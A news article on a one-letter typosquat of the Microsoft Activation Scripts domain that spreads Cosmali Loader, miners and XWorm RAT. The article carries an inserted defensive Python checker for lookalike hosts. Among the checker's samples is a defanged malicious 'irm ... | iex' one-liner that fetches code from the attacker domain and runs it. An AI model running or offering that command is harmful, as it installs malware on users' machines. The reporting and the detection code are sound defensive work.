Tuesday, 30 December 2025
  • 29 December 2025
  • 09:20
The One-Letter Trick: A Fake Windows Activation Domain That Spreads Malware

Khaberni - Recent security reports have revealed the use of a fake web domain, nearly identical to that of the well-known Microsoft Activation Scripts (MAS) tool, to spread malware that targets Windows systems through PowerShell commands, in an attack that relies on a simple spelling mistake a user could make.

According to BleepingComputer, a number of MAS users have begun reporting on Reddit that unexpected warning messages appeared on their devices, indicating they had been infected with malware known as Cosmali Loader.

A fake domain one letter off
The investigations showed that the attackers created a fake domain: get.activate[.]win.

It mimics the official domain used in the MAS instructions, get.activated.win.

The two domains differ by a single letter, which leaves users open to the trap when they type the command into PowerShell by hand.

Once the mistyped command is executed, malicious scripts are downloaded and the system is infected.
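As an added example (not code from the article or from the MAS project), a small Python checker that does what the one-letter trick defeats: it pulls the hosts out of a pasted PowerShell one-liner, undoes "[.]" defanging, flags any host within one edit of the official get.activated.win, and reports whether the command pipes downloaded text straight into iex. The sample commands in the main block are constructed.

```python
import re

# Official MAS host named in the article; the typosquat in this campaign differs from it by one letter.
OFFICIAL_HOSTS = {"get.activated.win"}

# Matches "| iex" / "| Invoke-Expression": downloaded text piped straight into the interpreter.
IEX_PATTERN = re.compile(r"\|\s*(iex|invoke-expression)\b", re.IGNORECASE)

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: the minimum number of single-character edits turning a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def normalize_host(host: str) -> str:
    """Undo common defanging ("[.]"), drop any port, lower-case, strip a trailing dot."""
    return host.replace("[.]", ".").split(":")[0].lower().rstrip(".")

def hosts_in_command(cmd: str) -> list:
    """Return the normalized host of every http(s) URL found in a PowerShell one-liner."""
    return [normalize_host(h) for h in re.findall(r"https?://([^\s/|;\"')]+)", cmd)]

def classify_host(host: str, max_distance: int = 1) -> str:
    """'official', 'lookalike' (within max_distance edits of an official host) or 'unknown'."""
    host = normalize_host(host)
    if host in OFFICIAL_HOSTS:
        return "official"
    if any(edit_distance(host, o) <= max_distance for o in OFFICIAL_HOSTS):
        return "lookalike"
    return "unknown"

def check_command(cmd: str) -> dict:
    """Summarize a pasted command: which hosts it fetches from, and whether it pipes into iex."""
    verdicts = {h: classify_host(h) for h in hosts_in_command(cmd)}
    pipes_to_iex = bool(IEX_PATTERN.search(cmd))
    risky = pipes_to_iex and any(v != "official" for v in verdicts.values())
    return {"hosts": verdicts, "pipes_to_iex": pipes_to_iex, "risky": risky}

if __name__ == "__main__":
    # Constructed samples: the official form from the MAS instructions and the one-letter typo.
    for cmd in ("irm https://get.activated.win | iex", "irm https://get.activate[.]win | iex"):
        print(cmd, "->", check_command(cmd))
```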

Mining and spyware
The security researcher known as RussianPanda confirmed that the notifications shown to users are tied to the open-source Cosmali Loader malware, noting that it had previously been used to download cryptocurrency miners as well as a remote-access Trojan known as XWorm RAT.

He also suggested that the warning messages were sent from inside the malware's control panel after a security researcher gained access to it, with the aim of alerting victims that their devices had been compromised.

Warnings from MAS developers
The operators of the MAS project, hosted on GitHub, warned users about the campaign and urged them to check commands carefully before running them, and to avoid retyping commands by hand so as not to fall into the trap of lookalike domains.

Experts advised against running any remote code without fully understanding what it does and without first testing it in an isolated environment (sandbox), especially since unofficial Windows activation tools have long been, and still are, a common vehicle for spreading malware.

Risks of unofficial activation tools
Although MAS is an open-source project, Microsoft classifies it as a hacking tool that circumvents its licensing system.

Cybersecurity experts confirm that using such tools exposes users to significant risk, up to and including complete loss of control over their devices.

A single wrong letter was enough to compromise thousands of devices, and with attacks based on lookalike domains on the rise, caution and verification of where commands and software come from remain the first line of defense against such threats.
